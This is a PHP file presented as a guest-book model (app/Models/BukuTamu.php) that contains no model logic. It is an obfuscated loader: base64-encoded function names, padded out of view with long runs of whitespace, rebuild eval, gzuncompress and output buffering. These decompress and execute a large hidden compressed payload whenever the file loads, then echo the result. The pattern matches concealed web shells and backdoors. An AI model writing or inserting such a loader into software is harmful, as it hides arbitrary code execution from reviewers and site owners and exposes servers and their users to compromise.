<?php 
        $__='printf';$_='Loading app/Models/BukuTamu.php';
        































































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='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';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      






























































































































































































                                                                                                                                                                                                                     $________;
